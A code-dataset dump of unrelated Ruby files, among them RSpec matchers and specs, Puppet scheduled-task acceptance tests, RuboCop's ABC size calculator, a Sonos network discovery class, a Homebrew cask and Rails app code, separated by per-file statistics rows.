class BeANew < RSpec::Matchers::BuiltIn::BaseMatcher
# @private
def initialize(expected)
@expected = expected
end
# @private
def matches?(actual)
@actual = actual
actual.is_a?(expected) && actual.new_record? && attributes_match?(actual)
end
# @api public
# @see RSpec::Rails::Matchers#be_a_new
def with(expected_attributes)
attributes.merge!(expected_attributes)
self
end
# @private
def failure_message
[].tap do |message|
unless actual.is_a?(expected) && actual.new_record?
message << "expected #{actual.inspect} to be a new #{expected.inspect}"
end
unless attributes_match?(actual)
if unmatched_attributes.size > 1
message << "attributes #{unmatched_attributes.inspect} were not set on #{actual.inspect}"
else
message << "attribute #{unmatched_attributes.inspect} was not set on #{actual.inspect}"
end
end
end.join(' and ')
end
private
def attributes
@attributes ||= {}
end
def attributes_match?(actual)
attributes.stringify_keys.all? do |key, value|
actual.attributes[key].eql?(value)
end
end
def unmatched_attributes
attributes.stringify_keys.reject do |key, value|
actual.attributes[key].eql?(value)
end
end
end
# Passes if actual is an instance of `model_class` and returns `false` for
# `persisted?`. Typically used to specify instance variables assigned to
# views by controller actions
#
# Use the `with` method to specify the specific attributes to match on the
# new record.
#
# @example
# get :new
# assigns(:thing).should be_a_new(Thing)
#
# post :create, :thing => { :name => "Illegal Value" }
# assigns(:thing).should be_a_new(Thing).with(:name => nil)
def be_a_new(model_class)
BeANew.new(model_class)
end
end
| 27.166667 | 101 | 0.636149 |
38afa890436d35b84e0ee2d24a903c4f3b55585f | 732 | # frozen_string_literal: true
module Pharos
module Configuration
class Bastion < Pharos::Configuration::Struct
attribute :address, Pharos::Types::Strict::String
attribute :user, Pharos::Types::Strict::String
attribute :ssh_key_path, Pharos::Types::Strict::String
attribute :ssh_port, Pharos::Types::Strict::Integer.default(22)
attribute :ssh_proxy_command, Pharos::Types::Strict::String
def host
@host ||= Host.new(attributes)
end
def method_missing(meth, *args)
host.respond_to?(meth) ? host.send(meth, *args) : super
end
def respond_to_missing?(meth, include_private = false)
host.respond_to?(meth) || super
end
end
end
end
| 28.153846 | 69 | 0.668033 |
bbc69bb0283e6e72b31f1303f6d7e992f88c169e | 1,254 | require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
require "active_storage/engine"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_view/railtie"
require "action_cable/engine"
# require "sprockets/railtie"
require "rails/test_unit/railtie"
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module PolitigoBackend
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.2
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
# Only loads a smaller set of middleware suitable for API only apps.
# Middleware like session, flash, cookies can be added back manually.
# Skip views, helpers and assets when generating a new resource.
config.api_only = true
end
end
| 34.833333 | 82 | 0.775917 |
28cb737cf9588d8282ae00b5793d38844d4d77c2 | 652 | # Copyright 2011, Dell
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Everyone needs chef-client running - redhat doesn't chkconfig this by default.
| 34.315789 | 80 | 0.76227 |
625242affda5b7e9f0e5b2f91eb26a3d72300006 | 757 | cask 'app-tamer' do
version '2.3.3'
sha256 '9fe9bda04d2dd33c83598fa90fe579631be79e1bb1c473c10d17d2a157a977af'
url "https://www.stclairsoft.com/download/AppTamer-#{version}.dmg"
appcast 'https://www.stclairsoft.com/cgi-bin/sparkle.cgi?AT',
checkpoint: 'bb25b0c3eb8ae2c2df14d62fa01e6c2a987cae7b0dfcc280b51e7cf4d7f426e6'
name 'AppTamer'
homepage 'https://www.stclairsoft.com/AppTamer/'
app 'App Tamer.app'
zap delete: [
'/Library/LaunchDaemons/com.stclairsoft.AppTamerAgent.plist',
'/Library/PrivilegedHelperTools/com.stclairsoft.AppTamerAgent',
'~/Library/Caches/com.stclairsoft.AppTamer',
'~/Library/Preferences/com.stclairsoft.AppTamer.plist',
]
end
| 37.85 | 88 | 0.698811 |
08385bd132d687e36ff6f91f1125a3a4a0c91038 | 6,724 | require 'spec_helper_acceptance'
describe 'Should create a scheduled task' do
username, password = add_test_user
username2, password2 = add_test_user
let(:username) { username }
let(:username2) { username2 }
let(:password) { password }
let(:password2) { password2 }
let!(:taskname) { "pl#{rand(999_999).to_i}" }
after(:all) do
remove_test_user(username)
remove_test_user(username2)
end
after(:each) do
run_shell("schtasks.exe /delete /tn #{taskname} /f", accept_all_exit_codes: true) do |r|
# Empty means deletion was ok. The 'The system cannot find the file specified' error occurs
# if the task does not exist
unless r.stderr.empty? || r.stderr =~ %r{ERROR: The system cannot find the .+ specified}
raise r.stderr
end
end
end
it 'creates a task if it does not exist: taskscheduler_api2', tier_high: true do
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
compatibility => 1,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
trigger => {
schedule => daily,
start_time => '12:00',
},
provider => 'taskscheduler_api2'
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Ensure it's idempotent
apply_manifest(pp, catch_changes: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd)
end
it 'creates a task if it does not exist: win32_taskscheduler', tier_high: true do
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
compatibility => 1,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
trigger => {
schedule => daily,
start_time => '12:00',
},
provider => 'win32_taskscheduler'
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Ensure it's idempotent
apply_manifest(pp, catch_changes: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd)
end
it 'creates a task with a username and password: taskscheduler_api2' do
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
user => '#{username}',
password => '#{password}',
trigger => {
schedule => daily,
start_time => '12:00',
},
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd) do |result|
expect(result.stdout).to match(%r{#{username}})
end
end
it 'creates a task with a username and password: win32_taskscheduler' do
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
user => '#{username}',
password => '#{password}',
trigger => {
schedule => daily,
start_time => '12:00',
},
provider => 'win32_taskscheduler'
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd) do |result|
expect(result.stdout).to match(%r{#{username}})
end
end
it "updates a task's credentials: win32_taskscheduler" do
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
user => '#{username}',
password => '#{password}',
trigger => {
schedule => daily,
start_time => '12:00',
},
provider => 'win32_taskscheduler'
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd) do |result|
expect(result.stdout).to match(%r{#{username}})
end
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
compatibility => 1,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
user => '#{username2}',
password => '#{password2}',
trigger => {
schedule => daily,
start_time => '12:00',
},
provider => 'win32_taskscheduler'
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd) do |result|
expect(result.stdout).to match(%r{#{username2}})
end
end
it "updates a task's credentials: taskscheduler_api2" do
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
user => '#{username}',
password => '#{password}',
trigger => {
schedule => daily,
start_time => '12:00',
},
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd) do |result|
expect(result.stdout).to match(%r{#{username}})
end
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
user => '#{username2}',
password => '#{password2}',
trigger => {
schedule => daily,
start_time => '12:00',
},
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd) do |result|
expect(result.stdout).to match(%r{#{username2}})
end
end
end
| 30.017857 | 98 | 0.563504 |
08e04c1d9037bed90340dbcad7f611adb3f93248 | 2,495 | class PresetsController < ApplicationController
require 'net/http'
require 'json'
require 'util'
def get_preset(id)
query = {
'query' => ActiveSupport::JSON.encode({'_id' => id}),
}
http = create_api_conn()
res = http.get("/presets/?#{query.to_query}")
return ActiveSupport::JSON.decode(res.body)[0]
end
def find_presets(query, skip = 0, limit = Rails.configuration.page_size)
q = {
'query' => ActiveSupport::JSON.encode(query),
'skip' => skip,
'limit' => limit
}
http = create_api_conn()
res = http.get("/presets/?#{q.to_query}")
@total = res['Total'].to_i
return ActiveSupport::JSON.decode(res.body)
end
# GET /presets
# GET /presets.json
def index
can?(:read, 'presets') do
filters = nil
skip = params.include?(:page) ? (Integer(params[:page]) - 1) * Rails.configuration.page_size : 0
@presets = find_presets(filters, skip)
respond_to do |format|
format.html # index.html.erb
format.json { render json: @presets }
end
end
end
# GET /presets/new
# GET /presets/new.json
def new
can?(:create, 'presets') do
@preset = {}
respond_to do |format|
format.html # new.html.erb
format.json { render json: @preset }
end
end
end
# GET /presets/1/edit
def edit
can?(:update, 'presets') do
@preset = get_preset(params[:id]) || {}
end
end
# PUT /presets/1
# PUT /presets/1.json
def update
can?(:update, 'presets') do
preset = {}
preset['weight'] = params['weight'].to_i
preset['precondition'] = params['query']
preset['configurations'] = ActiveSupport::JSON.decode(params['configurations'])
http = create_api_conn()
res = http.put("/presets/#{URI.escape(params['name'].strip)}", ActiveSupport::JSON.encode(preset))
if res.code == '200'
flash[:success] = 'Preset saved'
else
flash[:error] = "Unexpected error (#{res.code}): #{res.body}"
end
redirect_to :action => :index
end
end
# DELETE /presets/1
# DELETE /presets/1.json
def destroy
can?(:delete, 'presets') do
http = create_api_conn()
res = http.delete("/presets/#{URI.escape(params[:id])}", nil)
if res.code == '200'
flash[:success] = 'Preset deleted'
else
flash[:error] = "Unexpected error (#{res.code}): #{res.body}"
end
redirect_to :action => :index
end
end
end
| 24.70297 | 104 | 0.591182 |
79ed3c8eceb3f272e1526028afafaf502d213331 | 4,213 | # frozen_string_literal: true
module RuboCop
module Cop
module Metrics
module Utils
# > ABC is .. a software size metric .. computed by counting the number
# > of assignments, branches and conditions for a section of code.
# > http://c2.com/cgi/wiki?AbcMetric
#
# We separate the *calculator* from the *cop* so that the calculation,
# the formula itself, is easier to test.
class AbcSizeCalculator
include IteratingBlock
include RepeatedCsendDiscount
# > Branch -- an explicit forward program branch out of scope -- a
# > function call, class method call ..
# > http://c2.com/cgi/wiki?AbcMetric
BRANCH_NODES = %i[send csend yield].freeze
# > Condition -- a logical/Boolean test, == != <= >= < > else case
# > default try catch ? and unary conditionals.
# > http://c2.com/cgi/wiki?AbcMetric
CONDITION_NODES = CyclomaticComplexity::COUNTED_NODES.freeze
def self.calculate(node)
new(node).calculate
end
# TODO: move to rubocop-ast
ARGUMENT_TYPES = %i[arg optarg restarg kwarg kwoptarg kwrestarg blockarg].freeze
private_constant :BRANCH_NODES, :CONDITION_NODES, :ARGUMENT_TYPES
def initialize(node)
@assignment = 0
@branch = 0
@condition = 0
@node = node
reset_repeated_csend
end
def calculate
@node.each_node do |child|
@assignment += 1 if assignment?(child)
if branch?(child)
evaluate_branch_nodes(child)
elsif condition?(child)
evaluate_condition_node(child)
end
end
[
Math.sqrt(@assignment**2 + @branch**2 + @condition**2).round(2),
"<#{@assignment}, #{@branch}, #{@condition}>"
]
end
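# A worked example of the formula above (numbers are illustrative, not tied
# to a specific snippet): a method body counted as 2 assignments, 2 branches
# (method calls) and 1 condition reports
#   Math.sqrt(2**2 + 2**2 + 1**2).round(2)  # => 3.0
# and is rendered as "<2, 2, 1>".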
def evaluate_branch_nodes(node)
if node.comparison_method?
@condition += 1
else
@branch += 1
@condition += 1 if node.csend_type? && !discount_for_repeated_csend?(node)
end
end
def evaluate_condition_node(node)
@condition += 1 if else_branch?(node)
@condition += 1
end
def else_branch?(node)
%i[case if].include?(node.type) &&
node.else? &&
node.loc.else.is?('else')
end
private
def assignment?(node)
return compound_assignment(node) if node.masgn_type? || node.shorthand_asgn?
node.for_type? ||
(node.respond_to?(:setter_method?) && node.setter_method?) ||
simple_assignment?(node) ||
argument?(node)
end
def compound_assignment(node)
# Methods setter can not be detected for multiple assignments
# and shorthand assigns, so we'll count them here instead
children = node.masgn_type? ? node.children[0].children : node.children
will_be_miscounted = children.count do |child|
child.respond_to?(:setter_method?) &&
!child.setter_method?
end
@assignment += will_be_miscounted
false
end
def simple_assignment?(node)
if !node.equals_asgn?
false
elsif node.lvasgn_type?
reset_on_lvasgn(node)
capturing_variable?(node.children.first)
else
true
end
end
def capturing_variable?(name)
name && !/^_/.match?(name)
end
def branch?(node)
BRANCH_NODES.include?(node.type)
end
def argument?(node)
ARGUMENT_TYPES.include?(node.type) && capturing_variable?(node.children.first)
end
def condition?(node)
return false if iterating_block?(node) == false
CONDITION_NODES.include?(node.type)
end
end
end
end
end
end
| 30.309353 | 90 | 0.538571 |
bf32a231e3dd88cb624843157d911e2677f11786 | 540 | class User < ActiveRecord::Base
has_many :offers
# Include default devise modules. Others available are:
# :token_authenticatable, :confirmable,
# :lockable, :timeoutable and :omniauthable
devise :database_authenticatable, :registerable,
:recoverable, :rememberable, :trackable, :validatable
# Setup accessible (or protected) attributes for your model
attr_accessible :email, :password, :password_confirmation, :remember_me
attr_accessible :address, :description, :name
validates :name, presence: true
end
| 33.75 | 73 | 0.755556 |
08b2ecfb6249ab7338e6a0e5da42c8ba7ea46e68 | 3,380 | # -*- encoding : utf-8 -*-
require File.dirname(__FILE__) + '/test_helper.rb'
require 'irc_connector'
describe "Disconnected connector" do
before(:each) do
@socket = double()
@connector = IrcConnector.new("server", 6667, "nick", "username", "real name", ["#first", "#second"])
expect(@connector).to receive(:create_socket).and_return(@socket)
end
it "register to irc server and join channels on connect" do
expect(@socket).to receive(:send).with("USER username username username :real name\n", 0)
expect(@socket).to receive(:send).with("NICK nick\n", 0)
expect(@socket).to receive(:send).with("JOIN #second\n", 0)
expect(@socket).to receive(:send).with("JOIN #first\n", 0)
@connector.connect
end
end
describe "Connected connector" do
before(:each) do
@socket = double()
@connector = IrcConnector.new("server", 6667, "nick", "username", "real name", ["#first", "#second"])
@connector.set_socket(@socket)
end
it "remove additional line changes when sending" do
expect(@socket).to receive(:send).with("message with line feeds removed\n", 0)
@connector.send("message \nwith\r \nline\r\n feeds removed\r\n\n")
end
it "send privmsg" do
expect(@socket).to receive(:send).with("PRIVMSG target :hello, world\n", 0)
@connector.privmsg("target", "hello, world")
end
it "reply with pong to ping" do
expect(@socket).to receive(:send).with("PONG :12345\n", 0)
msg = @connector.handle_server_input("PING :12345")
expect(msg.msg_type).to eq(IrcMsg::PING)
end
it "detect privmsg to channel" do
privmsg = ":nickname!user@example.com PRIVMSG #channel :text and more text"
msg = @connector.handle_server_input(privmsg)
expect(msg.msg_type).to eq(IrcMsg::PRIVMSG)
expect(msg.from).to eq("nickname")
expect(msg.target).to eq("#channel")
expect(msg.text).to eq("text and more text")
end
it "detect privmsg to individual user" do
privmsg = ":nickname!user@example.com PRIVMSG target_nick :text and more text"
msg = @connector.handle_server_input(privmsg)
expect(msg.msg_type).to eq(IrcMsg::PRIVMSG)
expect(msg.from).to eq("nickname")
expect(msg.target).to eq("target_nick")
expect(msg.text).to eq("text and more text")
end
it "handle unexpected input" do
raw_msg = "SOME MESSAGE :from irc server that is invalid"
msg = @connector.handle_server_input(raw_msg)
expect(msg.msg_type).to eq(IrcMsg::UNHANDLED)
expect(msg.raw_msg).to eq(raw_msg)
end
it "detect that there are no new messages when select returns nil" do
expect(IO).to receive(:select).and_return(nil)
msg = @connector.read_input
expect(msg.msg_type).to eq(IrcMsg::NO_MSG)
end
it "detect that there are no new messages when select returns empty list" do
expect(IO).to receive(:select).and_return([[]])
msg = @connector.read_input
expect(msg.msg_type).to eq(IrcMsg::NO_MSG)
end
it "detect disconnection" do
ready = [[@socket]]
expect(IO).to receive(:select).and_return(ready)
expect(@socket).to receive(:eof).and_return(true)
msg = @connector.read_input
expect(msg.msg_type).to eq(IrcMsg::DISCONNECTED)
end
it "handle message" do
expect(@connector).to receive(:handle_server_input).with("a message")
ready = [[@socket]]
expect(IO).to receive(:select).and_return(ready)
expect(@socket).to receive(:eof).and_return(false)
expect(@socket).to receive(:gets).and_return("a message")
@connector.read_input
end
end
| 34.489796 | 102 | 0.719231 |
21762b66ab8935546a302b13a2a82cd8adb24843 | 346 | module UsersHelper
# Returns the Gravatar for the given user.
def gravatar_for(user)
gravatar_id = Digest::MD5::hexdigest(user.email.downcase)
gravatar_url = "https://secure.gravatar.com/avatar/#{gravatar_id}"
image_tag(gravatar_url, alt: user.username, class: "gravatar")
end
def get_user(uid)
User.find(uid)
end
end
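# View usage sketch (`some_user` is any User instance in scope):
#   <%= gravatar_for(some_user) %>
# renders an <img> tag whose src is the user's Gravatar URL.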
| 24.714286 | 70 | 0.719653 |
e9a3e3912d929abf59fa374baf45db83d4dcb96d | 1,821 | require 'json'
require 'helpers/acceptance/tests/manifest_shared_examples'
shared_examples 'basic acceptance tests' do |es_config|
include_examples('manifest application')
describe package("elasticsearch#{v[:oss] ? '-oss' : ''}") do
it { should be_installed
.with_version(v[:elasticsearch_full_version]) }
end
%w[
/etc/elasticsearch
/usr/share/elasticsearch
/var/lib/elasticsearch
].each do |dir|
describe file(dir) do
it { should be_directory }
end
end
describe 'resources' do
describe service('elasticsearch') do
it { send(es_config.empty? ? :should_not : :should, be_enabled) }
it { send(es_config.empty? ? :should_not : :should, be_running) }
end
unless es_config.empty?
describe file(pid_file) do
it { should be_file }
its(:content) { should match(/[0-9]+/) }
end
describe file('/etc/elasticsearch/elasticsearch.yml') do
it { should be_file }
it { should contain "name: #{es_config['node.name']}" }
end
end
unless es_config.empty?
es_port = es_config['http.port']
describe port(es_port) do
it 'open', :with_retries do
should be_listening
end
end
describe server :container do
describe http("http://localhost:#{es_port}/_nodes/_local") do
it 'serves requests', :with_retries do
expect(response.status).to eq(200)
end
it 'uses the default data path', :with_retries do
json = JSON.parse(response.body)['nodes'].values.first
data_dir = ['/var/lib/elasticsearch']
expect(
json['settings']['path']
).to include(
'data' => data_dir
)
end
end
end
end
end
end
| 26.779412 | 71 | 0.598572 |
08aeb5e733c19136f47b9c2a109eac4ae57131e7 | 1,832 | class NotificationData
attr_reader :title, :body, :extra, :icon, :link, :notification
def initialize(notification)
@notification = notification
@notifyable = notification.notifyable
if @notification.notifyable_type == 'EventUser'
init_event_user
elsif @notification.notifyable_type == 'EventSignup'
init_closing
end
end
def for_serializer
{ title: title, body: MarkdownHelper.markdown(body), extra: extra }
end
def android_data
{ title: title, body: MarkdownHelper.markdown_plain(body), notId: notification.id }
end
def ios_notification
{ title: title, body: MarkdownHelper.markdown_plain(body) }
end
def ios_data
{ notification_id: notification.id }
end
private
def init_event_user
@title = @notifyable.event.title
@link = @notifyable.event
if @notification.mode == 'position'
init_position
elsif @notification.mode == 'reminder'
init_reminder
end
end
def init_position
@icon = 'hashtag'
if @notifyable.reserve?
@body = I18n.t('model.notification_data.reserve_position', event: @notifyable.event)
else
@body = I18n.t('model.notification_data.attending', event: @notifyable.event)
end
if @notifyable.event_signup.notification_message.present?
@extra = @notifyable.event_signup.notification_message
end
end
def init_reminder
@icon = 'calendar'
@body = I18n.t('model.notification_data.remind_soon_starting',
event: @notifyable.event,
time: I18n.l(@notifyable.event.starts_at))
end
def init_closing
@icon = 'calendar'
@body = I18n.t('model.notification_data.remind_signup_soon_closing',
event: @notifyable.event,
time: I18n.l(@notifyable.event.signup.closes))
end
end
| 25.802817 | 90 | 0.680131 |
1821965aa22425cf53b8d9ce87eaf3c4a8c75334 | 907 | class TokyoMetro::Factory::Seed::Static::Station::RailwayLines < TokyoMetro::Factory::Seed::Static::RailwayLine::Hash
include ::TokyoMetro::ClassNameLibrary::Static::Station
private
def set_array_to_seed(h)
@h = h
end
def seed_main_infos
@h.each do | railway_line , in_each_railway_line |
puts " " * 4 * ( @indent + 1 ) + "※ #{ railway_line }"
puts ""
in_each_railway_line.seed( railway_line , @indent + 2 )
end
end
def seed_instance_for_escaping_undefined
puts "seed_instance_for_escaping_undefined"
self.class.db_instance_class.find_or_create_by(
same_as: "odpt.Station:Undefined" ,
name_ja: "未定義" ,
name_en: "Undefined" ,
railway_line_info_id: ::Railway::Line::Info.find_by( same_as: "odpt.Railway:Undefined" ).id ,
operator_info_id: ::Operator::Info.find_by( same_as: "odpt.Operator:Undefined" ).id
)
end
end
| 29.258065 | 117 | 0.68688 |
61f8fdbaafa2cc2fc815d799de2cc1425756112d | 1,878 | FactoryGirl.define do
sequence :name do |n|
"Foo bar #{n}"
end
sequence :email do |n|
"person#{n}@example.com"
end
sequence :uid do |n|
"#{n}"
end
sequence :permalink do |n|
"foo_page_#{n}"
end
factory :user do |f|
f.name "Foo bar"
f.email { generate(:email) }
end
factory :credi_card do |f|
f.subscription_id { generate(:uid) }
f.association :user, factory: :user
f.last_digits '1235'
f.card_brand 'visa'
end
factory :category do |f|
f.name_pt { generate(:name) }
end
factory :bank do |f|
f.name { generate(:uid) }
f.code '237'
end
factory :bank_account do |f|
f.association :bank
f.account '25334'
f.account_digit '2'
f.agency '1432'
f.agency_digit '2'
f.owner_name 'Lorem amenori'
f.owner_document '11111111111'
end
factory :project do |f|
f.name "Foo bar"
f.permalink { generate(:permalink) }
f.association :user, factory: :user
f.association :category, factory: :category
f.about_html "Foo bar"
f.headline "Foo bar"
f.goal 10000
f.online_date Time.now
f.online_days 5
f.video_url 'http://vimeo.com/17298435'
f.state 'online'
end
factory :contribution do |f|
f.association :project, factory: :project
f.association :user, factory: :user
f.value 10.00
f.payer_name 'Foo Bar'
f.payer_email '[email protected]'
f.anonymous false
after :create do |contribution|
create(:payment, paid_at: Time.now, gateway_id: '1.2.3', state: 'paid', value: contribution.value, contribution: contribution)
end
end
factory :payment do |f|
f.association :contribution
f.gateway 'pagarme'
f.value 10.00
f.state 'paid'
f.installment_value nil
f.payment_method "CartaoDeCredito"
after :build do |payment|
payment.gateway = 'pagarme'
end
end
end
| 21.101124 | 132 | 0.635783 |
287dd5f113e73467188a1013fd0efcef47bbdf4a | 87 | module Ires
module Mode
RESIZE = 0
CROP = 1
RESIZE_TO_CROP = 2
end
end
| 10.875 | 22 | 0.609195 |
2135afcc0bf8695b1fa57d95b546f0764832fad6 | 2,506 | require 'socket'
require 'ipaddr'
require 'timeout'
require 'open-uri'  # Kernel#open on a URL (used to fetch the topology XML)
require 'nokogiri'  # topology XML parsing
require 'sonos/topology_node'
#
# Inspired by https://github.com/rahims/SoCo, https://github.com/turboladen/upnp,
# and http://onestepback.org/index.cgi/Tech/Ruby/MulticastingInRuby.red.
#
# Turboladen's uPnP work is super-smart, but doesn't seem to work with 1.9.3 due to soap4r dep's.
#
# Some day this nonsense should be asynchronous / nonblocking / decorated with rainbows.
#
module Sonos
class Discovery
MULTICAST_ADDR = '239.255.255.250'
MULTICAST_PORT = 1900
DEFAULT_TIMEOUT = 2
attr_reader :timeout
attr_reader :first_device_ip
attr_reader :default_ip
def initialize(timeout = DEFAULT_TIMEOUT, default_ip = nil)
@timeout = timeout
@default_ip = default_ip
initialize_socket
end
# Look for Sonos devices on the network and return the first IP address found
# @return [String] the IP address of the first Sonos device found
def discover
send_discovery_message
@first_device_ip = listen_for_responses
end
# Find all of the Sonos devices on the network
# @return [Array] an array of TopologyNode objects
def topology
self.discover unless @first_device_ip
return [] unless @first_device_ip
doc = Nokogiri::XML(open("http://#{@first_device_ip}:#{Sonos::PORT}/status/topology"))
doc.xpath('//ZonePlayers/ZonePlayer').map do |node|
TopologyNode.new(node)
end
end
private
def send_discovery_message
# Request announcements
@socket.send(search_message, 0, MULTICAST_ADDR, MULTICAST_PORT)
end
def listen_for_responses
begin
Timeout::timeout(timeout) do
loop do
message, info = @socket.recvfrom(2048)
# return the IP address
return info[2]
end
end
rescue Timeout::Error => ex
puts 'Timed out...'
puts 'Switching to the default IP' if @default_ip
return @default_ip
end
end
def initialize_socket
# Create a socket
@socket = UDPSocket.open
# We're going to use IP with the multicast TTL
@socket.setsockopt(Socket::Option.new(:INET, :IPPROTO_IP, :IP_MULTICAST_TTL, 2.chr))
end
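    # Build the SSDP M-SEARCH datagram sent to the multicast group to solicit device responses.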
def search_message
[
'M-SEARCH * HTTP/1.1',
"HOST: #{MULTICAST_ADDR}:reservedSSDPport",
'MAN: ssdp:discover',
"MX: #{timeout}",
"ST: urn:schemas-upnp-org:device:ZonePlayer:1"
].join("\n")
end
end
end
| 27.23913 | 97 | 0.657223 |
38574e3d557464d627a9666c53a0802eebf6c033 | 715 | describe Travis::Api::Serialize::V2::Http::Permissions do
include Travis::Testing::Stubs
let(:permissions) do
[
stub(:repository_id => 1, :admin? => true, :pull? => false, :push? => false),
stub(:repository_id => 2, :admin? => false, :pull? => true, :push? => false),
stub(:repository_id => 3, :admin? => false, :pull? => false, :push? => true)
]
end
let(:data) { described_class.new(permissions).data }
it 'permissions' do
data['permissions'].should == [1, 2, 3]
end
it 'finds admin perms' do
data['admin'].should == [1]
end
it 'finds pull perms' do
data['pull'].should == [2]
end
it 'finds push perms' do
data['push'].should == [3]
end
end
| 23.064516 | 83 | 0.586014 |
b92774edceb907a55a56d35cbe627825b12fef21 | 732 | class Valvat
module Utils
EU_COUNTRIES = %w(AT BE BG CY CZ DE DK EE ES FI FR GB GR HU IE IT LT LU LV MT NL PL PT RO SE SI SK)
COUNTRY_PATTERN = /\A([A-Z]{2})(.+)\Z/
NORMALIZE_PATTERN = /[-\.:_\s,;]+/
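    # Split a VAT number into [country_code, number]; returns [nil, nil] unless the
    # ISO-mapped prefix belongs to an EU member state.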
def self.split(vat)
COUNTRY_PATTERN =~ vat
result = [$1, $2]
iso_country = vat_country_to_iso_country(result[0])
EU_COUNTRIES.include?(iso_country) ? result : [nil, nil]
end
def self.normalize(vat)
vat.upcase.gsub(NORMALIZE_PATTERN, "")
end
def self.vat_country_to_iso_country(vat_country)
vat_country == "EL" ? "GR" : vat_country
end
def self.iso_country_to_vat_country(iso_country)
iso_country == "GR" ? "EL" : iso_country
end
end
end
| 26.142857 | 103 | 0.631148 |
4a8b84d77957d047198b7ab311e48a9133c3969c | 5,111 | # encoding: utf-8
require_relative "../test_helper"
class CalendarTest < ActiveSupport::TestCase
context "finding a calendar by slug" do
should "construct a calendar with the slug and data from the corresponding JSON file" do
data_from_json = JSON.parse(File.read(Rails.root.join(Calendar::REPOSITORY_PATH, "single-calendar.json")))
Calendar.expects(:new).with("single-calendar", data_from_json).returns(:a_calendar)
cal = Calendar.find("single-calendar")
assert_equal :a_calendar, cal
end
should "raise exception when calendar doesn't exist" do
assert_raises Calendar::CalendarNotFound do
Calendar.find("non-existent")
end
end
end
should "return the slug" do
assert_equal "a-slug", Calendar.new("a-slug", {}).slug
end
should "return the slug for to_param" do
assert_equal "a-slug", Calendar.new("a-slug", {}).to_param
end
context "divisions" do
setup do
@cal = Calendar.new("a-calendar", "title" => "UK bank holidays",
"divisions" => {
"kablooie" => {
"2012" => [1],
"2013" => [3],
},
"fooey" => {
"2012" => [1, 2],
"2013" => [3, 4],
},
"gooey" => {
"2012" => [2],
"2013" => [4],
},
})
end
should "construct a division for each one in the data" do
Calendar::Division.expects(:new).with("kablooie", "2012" => [1], "2013" => [3]).returns(:kablooie)
Calendar::Division.expects(:new).with("fooey", "2012" => [1, 2], "2013" => [3, 4]).returns(:fooey)
Calendar::Division.expects(:new).with("gooey", "2012" => [2], "2013" => [4]).returns(:gooey)
assert_equal %i[kablooie fooey gooey], @cal.divisions
end
should "cache the constructed instances" do
first = @cal.divisions
Calendar::Division.expects(:new).never
assert_equal first, @cal.divisions
end
context "finding a division by slug" do
should "return the division with the matching slug" do
div = @cal.division("fooey")
assert_equal Calendar::Division, div.class
assert_equal "Fooey", div.title
end
should "raise exception when division doesn't exist" do
assert_raises Calendar::CalendarNotFound do
@cal.division("non-existent")
end
end
end
end
context "events" do
setup do
@divisions = []
@calendar = Calendar.new("a-calendar")
@calendar.stubs(:divisions).returns(@divisions)
end
should "merge events for all years into single array" do
@divisions << stub("Division1", events: [1, 2])
